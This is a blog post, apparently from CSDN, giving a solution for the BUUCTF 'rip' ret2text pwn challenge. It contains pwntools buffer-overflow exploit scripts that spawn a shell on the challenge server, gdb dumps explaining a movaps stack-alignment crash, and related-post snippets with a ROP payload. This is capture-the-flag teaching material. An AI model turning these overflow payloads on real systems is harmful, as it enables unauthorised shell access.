buuctf rip 1,ret2text解法

最新推荐文章于 2024-06-13 21:31:31 发布
最新推荐文章于 2024-06-13 21:31:31 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 技巧 文章标签: buuctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/amber_o0k/article/details/119462822
版权 
from pwn import *

url='node4.buuoj.cn:27164'
domain,port=url.split(':')
io = remote(domain,int(port))

payload = b'a'* 23 + p64(0x40118a)
io.sendline(payload)
io.interactive()

 87和8a两个地址都能奏效。

from pwn import *
url='node4.buuoj.cn:27164'
domain,port=url.split(':')
io = remote(domain,int(port))
ret=0x401016
backdoor=0x401186
payload=b'a'*23+p64(ret)+p64(backdoor)
io.sendline(payload)
io.interactive()

果然还是ubuntu栈对齐的问题,找一个ret 的地址填在中间就行了,这样会直接返回到fun函数的地址也能执行了

变量s存在于main函数的栈帧上,等main函数执行完毕ret后才会返回到backdoor地址

以下仅供研究用 

Leave时仍正常的栈

完全覆盖ebp的栈帧

完全覆盖ebp后,Gete函数后栈上的eip发生变化,_dl_start

完全覆盖ebp+fun address可以跳转到fun,但在执行system的过程中segment  fault,

貌似为xmm浮点寄存器的问题

覆盖ebp后,接随便一个ret地址或者0x4011a0 (__libc_csu_init)地址均可以正常getshell

在发生SIGSEGV错误时的gdb信息,

   0x7f929d2a93f6 <do_system+1078>: movq   xmm0,QWORD PTR [rsp+0x8]

   0x7f929d2a93fc <do_system+1084>: mov    QWORD PTR [rsp+0x8],rax

   0x7f929d2a9401 <do_system+1089>: movhps xmm0,QWORD PTR [rsp+0x8]

=> 0x7f929d2a9406 <do_system+1094>: movaps XMMWORD PTR [rsp+0x40],xmm0

   0x7f929d2a940b <do_system+1099>: call   0x7f929d299230 <__GI___sigaction>

   0x7f929d2a9410 <do_system+1104>: lea    rsi,[rip+0x39e1e9]        # 0x7f929d647600 <quit>

   0x7f929d2a9417 <do_system+1111>: xor    edx,edx

   0x7f929d2a9419 <do_system+1113>: mov    edi,0x3

[------------------------------------stack-------------------------------------]

0000| 0x7ffefdffa848 --> 0x7f929d2f11cc (<__GI___libc_malloc+140>: test   rax,rax)

0008| 0x7ffefdffa850 --> 0x7f929d40de17 (sub    eax,0x622f0063)

0016| 0x7ffefdffa858 --> 0x0

0024| 0x7ffefdffa860 --> 0x0

0032| 0x7ffefdffa868 --> 0x7f929d2a9470 (<cancel_handler>: push   rbx)

0040| 0x7ffefdffa870 --> 0x7ffefdffa864 --> 0x9d2a947000000000

0048| 0x7ffefdffa878 --> 0x7f929d2d828a (<__GI__IO_file_doallocate+170>: mov    eax,0x1)

0056| 0x7ffefdffa880 --> 0x2

[------------------------------------------------------------------------------]

Legend: code, data, rodata, value

Stopped reason: SIGSEGV

0x00007f929d2a9406 in do_system (line=0x40201b "/bin/sh") at ../sysdeps/posix/system.c:125

125 ../sysdeps/posix/system.c: No such file or directory.

LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA

─────────────────────────────────[ REGISTERS ]──────────────────────────────────

 RAX  0x7f929d40de17 ◂— sub    eax, 0x622f0063 /* '-c' */

 RBX  0x0

 RCX  0x7f929d40de1f ◂— jae    0x7f929d40de89 /* 'sh' */

 RDX  0x0

 RDI  0x2

 RSI  0x7f929d6476a0 (intr) ◂— 0

 R8   0x7f929d647600 (quit) ◂— 0

 R9   0x0

 R10  0x8

 R11  0x246

 R12  0x40201b ◂— 0x68732f6e69622f /* '/bin/sh' */

 R13  0x7ffefdffaac0 ◂— 0x1

 R14  0x0

 R15  0x0

 RBP  0x7ffefdffa8a8 ◂— 0x0

 RSP  0x7ffefdffa848 —▸ 0x7f929d2f11cc (malloc+140) ◂— test   rax, rax

 RIP  0x7f929d2a9406 (do_system+1094) ◂— movaps xmmword ptr [rsp + 0x40], xmm0

─────────────────────────────────────[ DISASM ]─────────────────────────────────────

 ► 0x7f929d2a9406 <do_system+1094>    movaps xmmword ptr [rsp + 0x40], xmm0

   0x7f929d2a940b <do_system+1099>    call   sigaction <sigaction>

   0x7f929d2a9410 <do_system+1104>    lea    rsi, [rip + 0x39e1e9] <0x7f929d647600>

https://students.mimuw.edu.pl/~zbyszek/asm/en/instrukcje-sse.html

 movaps操作的地址必须是16字节对齐的,也就是0x10,这种最低位是0的情况。

movaps XMMWORD PTR [rsp+0x40],xmm0,要求[rsp+0x40]必须对齐0x10

XMM registers

The 128-bit XMM registers are part of the SSE extension (where SSE is short for Streaming SIMD Extension, and SIMD, in turn, stands for single instruction multiple data). There are eight XMM registers available in non -64-bit modes and 16 XMM registers in long mode, which allow simultaneous operations on:

  • 16 bytes
  • eight words
  • four double words
  • two quad words
  • four floats
  • two doubles

RAVEN_1452
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buu rip1
weixin_42238862的博客
10-02 1万+
文章目录前言一、看看程序有没有保护二、对程序源码进行分析1.判断溢出点2.手动测试溢出字符长度3.EXP总结 前言 本人刚刚入坑二进制不久,因为以前主玩渗透测试,所以喜欢学习理论的同时,做一些实战的题目,这不就在BUU上看到了一道pwn的入门题RIP1,但是这个题也让我知道二进制的门槛不是一般的高,第一次写文章,大佬勿喷! 一、看看程序有没有保护 常规操作,查看程序的位数以及各种保护机制!可以看到程序是linux下的程序为64位,并且没有开启任何保护 二、对程序源码进行分析 1.判断溢出点 把程序拖进
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2471
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF刷题之路-rip1
qq_30528603的博客
05-25 1265
因为A存入内存是以ASCLL码形式存在 0x41就是A,我们填入的15个A已经在栈上了,而且返回地址就是401100,我们要做的就是覆盖这个返回地址,指向我们的后门函数fun,至此这题就完成了。让我们能得到一个shell.那我们就找一下这个fun函数的地址,因为题目没有开启PIE,所以程序每次加载的地址都是不变的。可以看到保护基本没开,是个很简单的栈溢出题目。左边这都是函数,带下划线的一般是系统提供的函数,我们分析前可以大致看看有哪些函数,都干了什么,对整体布局有个了解,我们一开始都回去分析main函数。
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 5657
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
buuctf-rip
最新发布
Nike_name的博客
06-13 351
利用get危险函数和system/bin/sh 的栈溢出
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1152
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
【Pwn | CTF】BUUCTF rip1
weixin_46301214的博客
02-02 599
可能是因为fun函数里有system这种终端控制函数,所以能getshell吧。那么来看一下main,发现很简单,只有一个gets获取输入,存到s数组变量里。打开IDA,发现函数里有一个fun函数,能直接调用系统函数。然后又可以建立连接,很屌,解释不清楚,以后做多两题才懂。知道了缓冲区大小,下一步就要知道fun函数的入口地址。这文件是在靶机,就是靶机存在这个漏洞,我们要攻击他。从汇编上看,是能够发现有注释告诉我们的入口地址。我们要做的就是利用这个函数进行调用系统函数。看一下双击s变量,缓冲区大小。
入门pwn题目ret2text
03-26
入门pwn题目ret2text
pwn07.ret2syscall例题
11-11
ret2syscall例题
ret2text涉及到的堆栈平衡问题-附件资源
03-05
ret2text涉及到的堆栈平衡问题-附件资源
ret2libc1pwn 入门题
02-11
pwn 入门题
BUUCTF_PWN - rip
weixin_46009088的博客
12-06 721
BUUCTF_PWN - rip 查看程序保护模式和文件基本信息: 没有什么保护,各条保护详情介绍请看胡写瞎写(1) pwntools常见命令,另外文件是64位小端程序 IDA载入 找到main函数F5: 发现一个 gets ( ) 函数,一个可以利用的漏洞点,gets ( ) 函数介绍: get( )函数简单易用,它读取从输入流中读取一行,赋给字符串变量s,直到遇到换行符,然后丢弃换行符,存储其余的字符,并在结尾添加一个空字符使其成为一个 C 字符串,但是它无法检查数组是否装的下,因此它只知道开始处,.
BUUCTF -rip
weixin_56301399的博客
07-20 386
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
BUUCTF-rip
m0_64180167的博客
04-11 659
看了这个文章 我起码能理解我们栈溢出的目的在做题之前 我们需要先理解栈的存储方法从上往下看 就能理解入栈说回这道题目为什么这道题目是栈溢出。
ret2text
m0_54262894的博客
10-28 228
最近攻防世界和BUUCTF中剩下我没做过的题目已经对于我来说有些困难了 所以我在CTF wiki 里开始学习,顺便再巩固一下基础 这里是原文 老样子,先checksec 放入ida中查看 main函数 发现了gets这个危险函数,接着往下看 用Shift+F12查看 发现了/bin/sh 这里你会看到有两个/bin/sh,但我们需要的是text中的地址 记住 text 中 /bin/sh 的地址0x804863A ...
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4924
BUU CTF PWN 入门知识详解
pwn学习(3)BUUCTF-rip(函数知识/缓冲区溢出)
m0_66039322的博客
09-21 579
1.函数调用栈是指程序运行时内存一段连续的区域。(特殊的内存)2.用来保存函数运行时的状态信息,包括函数参数与局部变量等。3.称之为‘栈’是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。4.在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态5.函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。
BUUCTF rip 1
qq_56313338的博客
09-09 286
这是一题栈溢出,也提及了栈对齐操作
pwn | BUUCTF rip 1&& pwn基本思路
Mintind的博客
04-26 1123
(写得好详细我好爱(为什么payload有两种写法于。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值